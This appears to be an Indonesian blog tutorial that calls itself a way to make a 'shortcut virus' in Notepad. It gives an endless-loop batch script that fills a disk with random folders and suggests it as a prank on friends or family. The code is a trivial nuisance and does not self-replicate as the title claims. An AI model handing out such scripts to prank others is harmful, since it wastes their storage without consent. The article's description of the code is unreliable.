Cara Membuat Virus Shortcut di Notepad


Cara Membuat Virus Shortcut di Notepad - Seperti judul artikel ya kami akan berbagi suatu cara membuat virus shortcut di notepad, Virus yang satu ini memang sedikit mengjengkelkan, karena cara kerja virus yang satu ini menyebarkan dan menggandakan dirinya dengan cara menyamar sebagai shorcut program ataupun file yang ada di komputer anda.

Apa itu virus? Sedikit akan kami jelaskan kepada kalian apa itu virus?, Virus komputer adalah program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain.

Dalam artikel kali ini kita akan membuat virus semacam Virus Shortcut, dan jumlahnya pun kita buat lebih banyak dari virus aslinya, kita akan membuat Virus Shortcut sebanyak 10000 biji atau lebih. Tapi tenang saja virus yang kita buat ini tidak berbahaya kok, cuma bikin jengkel aja ngabisin tempat dengan jenis ribuan folder. Pasti jengkel bukan? Asik asik dong kalo mau ngerjain temen atau keluarga, tapi ingat ya cara ini tidak untuk merugikan orang lain gunakan cara ini dengan bijak dan untuk menambah wawasan dan ilmu amda tentang Virus Shortcut. Oke langsung simak dibwah caranya.

Langkah Cara Membuat Virus Shortcut di Notepad :

● Buka Notepad.

● Lalu ketik/copas code dibawah ini di Notepad yang telah kalian buka tadi.

@echo off
:top
md %random%
goto top

● Kemudian "Save As".

● Simpan dengan nama sesuka kalian
tetapi formatnya harus .BAT
Contoh :
Kalian ingin menyimpan dengan nama "Weleh". maka jadi "Weleh.bat"

● Untuk menjalankan Virus nya kalian tinggal klik 2x pada file tersebut.

● Dan untuk menghapusnya kalian tinggal pencet CTRL+A lalu delete..

● Suksess.

#Note: Gunakan Trik di atas dengan bijak ya tidak untuk merugikan orang lain.

★Berikut adalah sebuah artikel Cara Membuat Virus Shortcut di Notepad yang kami berikan untuk kalian. Ayo suport blog Botol-Pecah! Sederhana kami dgn cara berkomentar atau share artikel kami, agar kami selalu memberikan artikel terbaik kami untuk kalian★

Semoga Bermanfaat.

0 komentar